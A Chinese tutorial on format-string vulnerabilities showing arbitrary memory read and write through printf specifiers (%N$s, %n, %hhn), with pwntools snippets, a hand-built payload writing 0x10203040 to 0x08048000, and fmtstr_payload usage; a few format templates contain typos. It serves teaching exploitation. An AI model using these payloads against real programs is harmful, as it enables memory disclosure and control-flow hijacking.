读任意地址
printf("%x")
只给格式化字符串,而不给参数,会导致内存泄漏从而读到内存中其他地址的数据。
%N$x
参数可以以16进制方式打印第N个参数的内容,通过修改N,我们可以遍历栈上的所有内容。
通过%N$s
参数,我们可以将第N个参数对应的内容作为字符串的地址从而获得内存中任意位置的内容。方法如下
- 如果我们使用的打印语句为:
printf("AAAA%x")
那么栈的内容如下:
- 使用
printf("AAAA%N$x")
,并令N=1,2,3,… 假设,当N=6时得到如下输出内容:
AAAA41414141#
其中41是‘A’的ASCII码,‘41414141#’正好是4个字节,即int的大小,这说明偏移量为6时正好读到格式化字符串在栈中的位置。 - 使用
printf("%7$sAAAA")
,则栈内容如下:
我们知道偏移量为6时正好能读到‘%’的位置,那么偏移量为7的时候会往栈底方向再走4个字节,于是得到的内容为‘AAAA’,而由于这次我们使用的是%s
打印符,因此会打印地址‘AAAA’处的内容,通过修改‘AAAA’的内容,就可以打印任意内存位置的内容。
4. 可以用pwntool实现该功能如下:
from pwn import *
context.log_level='debug'
conn=process('./test')
conn.sendline("%7$s"+p32(0x08048000))
print conn.recv()
写任意地址
写地址要用到%n
格式化符,例如printf("AAAA%n",&a)
,会将‘AAAA’的长度值4写入变量a。如果采用printf("AAAA%N$n")
就可以向地址偏移N的位置的值解析为指针,并将指针指向的地址写入4。
例如:printf("AAAA%6$n")
,由于前面的测试中我们发现偏移值是6,因此偏移6对应的栈位置为‘AAAA’,程序将‘AAAA’解析为地址,并向该地址写入"AAAA%6$n"的长度值8.
如果要像任意地址写入任意数值,我们不可能真的构造那么长的字符串,这时可以采用如下格式化符一次写入多个字节:
32位
读
'%{}$x'.format(index)
'%{}$p'.format(index)
'${}$s'.format(index)
写
'%{}$n'.format(index)
'%{}$hn'.format(index)
'%{}$hhn'.format(index)
'%{}$lln'.format(index)
64位
读
'%{}$x'.format(index, num)
'%{}$lx'.format(index, num)
'%{}$p'.format(index)
'${}$s'.format(index)
写
'%{}$n'.format(index)
'%{}$hn'.format(index)
'%{}$hhn'.format(index)
'%{}$lln'.format(index)
%1$lx: RSI
%2$lx: RDX
%3$lx: RCX
%4$lx: R8
%5$lx: R9
%6$lx: 栈上的第一个QWORD
举个例子,我们希望向0x08048000写入值0x10203040,可以这样构造:
\x00\x80\x04\x08\x01\x80\x04\x08\x02\x80\x04\x08\x03\x80\x04\x08%48c%6$hhn%240c%7$hhn%240c%8$hhn%240c%9$hhn
分解一下就是四个地址加上四个格式化字符
\x00\x80\x04\x08
\x01\x80\x04\x08
\x02\x80\x04\x08
\x03\x80\x04\x08
%48c%6$hhn
%240c%7$hhn
%240c%8$hhn
%240c%9$hhn
即对0x08048000写入16+48=64=0x40
对0x08048001写入0x40+240=304=0x130=0x30
对0x08048002写入0x30+240=288=0x120=0x20
对0x08048003写入0x20+240=272=0x110=0x10
但是这个payload以0x00开头,可以手工调整一下,调换地址与格式化字符的位置,还要改一下n的值.
当然,这样还是过于麻烦,实际上可以使用pwntool的fmtstr模块
fmtstr_payload(6, {0x08048000:0x10203040})
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)